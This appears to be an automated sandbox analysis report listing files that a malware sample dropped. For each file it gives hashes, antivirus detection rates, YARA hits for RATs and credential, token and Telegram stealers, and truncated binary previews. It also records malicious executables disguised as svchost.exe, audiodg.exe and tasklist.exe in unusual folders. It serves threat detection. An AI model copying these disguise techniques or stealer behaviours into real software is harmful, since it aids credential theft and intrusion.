SHA-512:	54605390EC35BF03C1A60F1E57A36985CC89256F77F0CD884EEDEFB282E0703D3A88F0BB1F85DFDF8D8C6FDBBCD21669F6814CCAD0ED14817AB024584C27F5F5
Malicious:	false
Preview:	6mmyykkS0Z7Z8OGyvAFpJeHrgOtlb4OHQWbUNUjeTXKUQsNGkR7XlsQce5Rk0915KzJmxwkablVvTxbyAmBJ71ghG9zSC9nUgPJbjlTyqg5AWeIqedkO7r7TTlfy6SXb8BPEo9OYSNcb5gKm0IxjYYWyR0I7Fe1YIeBVOECeOL6uPgXwa37xeyCkobxy1RSyVESbezXwGTVNcljucVgLgE3UbbqxQOn62IZLN5SlgLrLczID2CVguHRQK8ADJkf1qYUUMXggD5pVXs1lTn5O3HMv1IAO5Oc5pzeDey0efycyb53bHZufpR8jLjdDXSlydtqhNxGfwasEoYT5OjHge6QX0515UxHNNoUrOVNTSPtOj45xPhzxKFThdSrS5KK9Te19Dlq2VyNPMCy6AEqx8TDHUxO5o5Y

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\ProgramData\Microsoft\based.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7710613
Entropy (8bit):	7.993044557398592
Encrypted:	true
SSDEEP:	196608:h/kOeGOshoKMuIkhVastRL5Di3xS1DmR7:VkQOshouIkPftRL54csF
MD5:	6FA985B82082F957E08C24749C36D88B
SHA1:	F282605211895ED064BA987F190BA18324C6D12B
SHA-256:	FE21BFA05716C03F4D0F9D6B071D542D38E7AF33D58D00CC56445D893C4DA6A0
SHA-512:	03C21F4EBD172B7C088D523AB3B56077B259804502F004E60BB1BA3EB89DA44BA1F6DB99A227FC84D710560132B1B2BBC2D7D93F4F5C411FFCFF5EF9F46BBF57
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d......f.........."....(.....p.................@......................................u...`.................................................\...x....p..(....@..P"..M.u.H$......d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc...(....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\hacn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15608127
Entropy (8bit):	7.998076685766804
Encrypted:	true
SSDEEP:	393216:HDfDoc6vWh2uCaoj0wAyvBF21TI6nx0I:Hb7uWhni0wx36
MD5:	2F20A53D05D89D72A94192A6B8098B77
SHA1:	5558FEA4D61191AE61F1996A2800B7A17A3F34E0
SHA-256:	26C5013C45B75F401BDF8C8389BB66B9F17BDC1CD0851A8B1803EC7A85DBD96A
SHA-512:	147E0243FF304AA5316A0E1389F55C969193BF8513E893BF8FE7C1F3D9FF37AFBB0CBBEEB966A98FC728E6B81B14BF4E440E5989E485FE461BB8BF7DC93B814E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d.....f.........."....%.....p.................@....................................B2....`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................

C:\ProgramData\main.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5872348
Entropy (8bit):	7.487099220868339
Encrypted:	false
SSDEEP:	98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciY
MD5:	3D3C49DD5D13A242B436E0A065CD6837
SHA1:	E38A773FFA08452C449CA5A880D89CFAD24B6F1B
SHA-256:	E0338C845A876D585ECEB084311E84F3BECD6FA6F0851567BA2C5F00EEAF4ECF
SHA-512:	DD0E590310392B0543D47A2D24D55F6F091BA59ACC0D7EA533039FFB48F1B8938587889BCFA19B0538A62BA26FCDE2172253860CEAB34AF40FD7BF65B6587B00
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(......(......{...."..}......F.{....o....s.......2...{....o..../..{.....o.....s,......(....,.(........2...{....o....2..{.....o.....{......o......s,...v..(....,.(.......{.....o....2.{....o.......2...{....o....2...{.....o.....{.....o....>.{.....o....&...0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s

C:\ProgramData\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\ProgramData\svchost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4042529
Entropy (8bit):	7.700603596238004
Encrypted:	false
SSDEEP:	98304:yxbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6j:4bbi1IXr5nmG9Hb7VmX86j
MD5:	45C59202DCE8ED255B4DBD8BA74C630F
SHA1:	60872781ED51D9BC22A36943DA5F7BE42C304130
SHA-256:	D07C47F759245D34A5B94786637C3D2424C7E3F3DEA3D738D95BF4721DBF3B16
SHA-512:	FFF5B16AE38681ED56782C0F0423560DAB45065685D7272424206F43C80486318180AA22D66BD197C8C530E4C24DBAAAA020BEB76B619DC767EE59FAA27E23ED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\3D Objects\d62086b577a668

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (755), with no line terminators
Category:	dropped
Size (bytes):	755
Entropy (8bit):	5.9211017774137105
Encrypted:	false
SSDEEP:	12:16VXoU9YDEsQTauII+pdrw1xmPAF7Dv1ICxo0szzUgAcgw4nzfc7VW4iOGTHiDGW:16nYYXUtGgATzC5ApnzfiVW1Cz
MD5:	3F96D5934A042B8DD7737E704BF936B4
SHA1:	7AAC97EC7EEF65C09AD78EA61B3BB8A7008FC46B
SHA-256:	C7E050BB2225E9CD2FAFE8AD6452F564CEF5CCB2D1FC1C8239EA20E7802209A7
SHA-512:	2F0FD0E5316206055071E1AEDE15FD09B83D51BE0A454CE158E3C4DCC69943BA1316D1F74017C1210D706AA78DF669A9A6348A9F309A232CFDF00365113DA3C9
Malicious:	false
Preview:	n06cW2DUbeuR1eWAAbtoPXvOZaFKcHs3FTC7C0rPQdxb4ogmst4nSQfQFrD6w31Tv0MicZ8JteXvjTUv3cctNFlyyw1UxudXlepDb8KSuu4y2trvXRCTaIGqPXtqhoW8BAKFoQT5RK8dKw6EEG6fsJ7dX8xDOeuFY5w2jlGH8HBQKnfcbolbs0Q1CrrqcPqxZ2EP9Dfd9yhkIqSucVlj3TWio5z14aosaO1RiQcYIIb3SptVY6OHnH3FfglEOoijKzK3zBMM2Nav1dP8Ldd7LgETUvvCoYJej1tdfzfWuBPZqHNCRm2uKkXnu0jEPJheE5MAtvdW7GNKRonMhtvCfZU8eFtpQbHkevVu5NTfJgwDXNWFNWhgYf8olNgoCxFg9mpgS2RTZP29mQlQtnc43kL9wrIsrocVaQEui0xUENGJm9CVlP4YVLmZaqtltimvwhiWM0s20IzqdCWxpxGbuEAPnpU1GLkglVWFapJvhBiNV65YT666bKAsgTshg0wohTEHqRX9oV4sfw3rt5iKPoEbUniG7mOqP3pC1xrCj6RGPSNuZAxkSmZ3OnwDsQCCHNcmH1z5OfkTX8LCayr6ynYnewxOAoTT4O9CzkniL1WwBGgQbum4iFOdzzHUDl4kMRYI9JMzLJv6RllYQhxQBZuyAfN9dSek7vktrXRShxtZURLNNtEgyoixhjHd5NV2oL9gB2q2PesOpUetUAvuO7wSMxLIPyWUb0vIRpMVCLQT5UHNEYI

C:\Users\user\3D Objects\tasklist.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\3D Objects\tasklist.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\3D Objects\tasklist.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ChainComServermonitor.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
MD5:	0C47412B6C6EF6C70D4B96E4717A5D3B
SHA1:	666FCC7898B52264D8A144600D7A3B0B59E39D66
SHA-256:	0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
SHA-512:	4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cmd.exe.log

Download File

Process:	C:\Windows\Logs\SettingSync\cmd.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\main.exe.log

Download File

Process:	C:\ProgramData\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1678
Entropy (8bit):	5.369913341429046
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6ogLHitHTHhAHKKkyHpHNp51qHGIs0HKD:iqbYqGSI6ogLCtzHeqKkyJtp5wmj0qD
MD5:	47EF549ED9A6077539E2B7E16049BF8F
SHA1:	2129E12D767465A7F083AB906EB481DB88B47D0E
SHA-256:	ABACC0BCEB0B100C7FDC2DDDF3CDDCCB8C048466FD886D0A015AB49D5B0A38A7
SHA-512:	EB77CA4097CD1F268E6462D7FA3F864700B7113A637C755FCFF843A01DE6088A7B3588D2CFD1C6C9F018E93783019E338793E7EC5FC29BDBCE6E6604AEB91A99
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKey

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	691570
Entropy (8bit):	7.926956548496752
Encrypted:	false
SSDEEP:	12288:fmdao6o0nRBx3Ip1lQaEzLw+tOhfXJKf0Td+vM0mo2k4GVzZPvD4aeNb:f0aorGd3/zLsKoOyk4GVzZPvca+
MD5:	E90D095262101723365FC6FA5C7C3F12
SHA1:	F5B505945166A24D3B023539D97963AFFF698674
SHA-256:	46A50442C731D5CA1E8714BD2C72052DE862F25777CC2887AAEEDFDB6E9CCA4D
SHA-512:	DDBF33B18857C962B3AA138E5E0CAD7AFED26FD3068E3864C1E1EF849133472EB2BAA938D6A5E14D6DB0E1CB6E678D0A99F19B1051F4C303CA1FBEAD8D522B09
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g.mWy...}n..F.......v..rUuw9T..F..I.9G$.."...lrF.L2.H"C......Y.,.I.L6.......}.=..9..s...9c<c...w..>Wp.3..`p.....S.......q~..........-..6X5.?_9.7..;..{....Yh...ZOv...7.2\|.w...S.ol=p.y.......o...ks....=.k..G.......j..L..*..`.g..o....G._v...c....X../Y=...}......kkb.._.<.+...O......f..c....-<.%..}&...~...U.\...y..g.:?O...>./.......S.0.M......O.......T..............r_.]x..f..q9...le.cF,<.3......U.....1.O.y.w,q.)..O/..lz...#.]7v....my...nZ...XYx...%.......aK....1\|....a..^.m..%...].P.7.6b.CK...ae......!.V./.z.8..a7u[O+{.zM..!WW...r.qn.i....S..<..R.gqr..I.t.'^..O.....e.....ro%.X..r.u......[..<.........Me..qW.6....h[.....P..a..2w....1..c.O...vR..c........G_........).s.e..c..G.j.c.zB.Vi.G]R...Ee.q........g.Z>..c...cc.....Y.<.S.....G...e.`....+......){Na...V.<b...}.+.?..n.k....~..._4..s.a..e....b-......e}i.o>...tQ...r..'f..g...~D..K,....w~7<..78..

C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Download File

Process:	C:\ProgramData\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1829040
Entropy (8bit):	6.564424655402829
Encrypted:	false
SSDEEP:	49152:c9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP3:c9Nzm31PMo3
MD5:	65CCD6ECB99899083D43F7C24EB8F869
SHA1:	27037A9470CC5ED177C0B6688495F3A51996A023
SHA-256:	ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4
SHA-512:	533900861FE36CF78B614D6A7CE741FF1172B41CBD5644B4A9542E6CA42702E6FBFB12F0FBAAE8F5992320870A15E90B4F7BF180705FC9839DB433413860BE6D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ................................................................6U....`.................................................P...x................!.......T...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESB2CE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Mon Sep 2 16:22:20 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1960
Entropy (8bit):	4.6326429857022235
Encrypted:	false
SSDEEP:	48:G/Lzv3SnKMCWYilmuulB+hnqXSfbNtmhb:G/nvaKkYi2TkZzNtyb
MD5:	5779FFD4B8F64CB6A42FFD94856A575E
SHA1:	EC38DF233FF308EECF19B05B3CABFB7365EE37BD
SHA-256:	9A6FDD344B08A88D9DA3CE6A678D3544A9CDF755351291A92C7CD9C3A9411987
SHA-512:	4E2801C39E4D0C973F549BB81AF9A9BD986370639FD6ABFBEBA5649DDC686FFE9ED38DF43B2CD2A77C1643E26E91F8D949095E2F4DD013947F7BDBA69222914F
Malicious:	false
Preview:	L...<..f.............debug$S........x...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCD2DF9DC1BB554A3A91A2FCAEEB39352E.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RESB2CE.tmp.-.<....................a..Microsoft (R) CVTRES.~.=..cwd.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...

C:\Users\user\AppData\Local\Temp\RESBBF6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Mon Sep 2 16:22:23 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1376
Entropy (8bit):	4.130859178297294
Encrypted:	false
SSDEEP:	24:HSO9gTX7tGFbKHpwKamgdXNeI+ycuZhNkqakSvbPNnqSQEgd:U9GsyKaZxw1ulkqa3vRqSZ0
MD5:	35D599FCCD6B9BEEEEFF99D3819D32B1
SHA1:	D9F743490A49F438CCF4DF0C13B9EFEB32F05F98
SHA-256:	8174A43F907AA5684D708E7F8E7F20F31A59BF1C8700D8A709B7C80C5A94F450
SHA-512:	DAA177238CBEF99B908AC39F8EFCE8FBF55F4143828E55C933A2A80274D456DD0128065EFC024C49072623CC545370273A9E85A57FFBEFA28A5F3E892CEC96F6
Malicious:	false
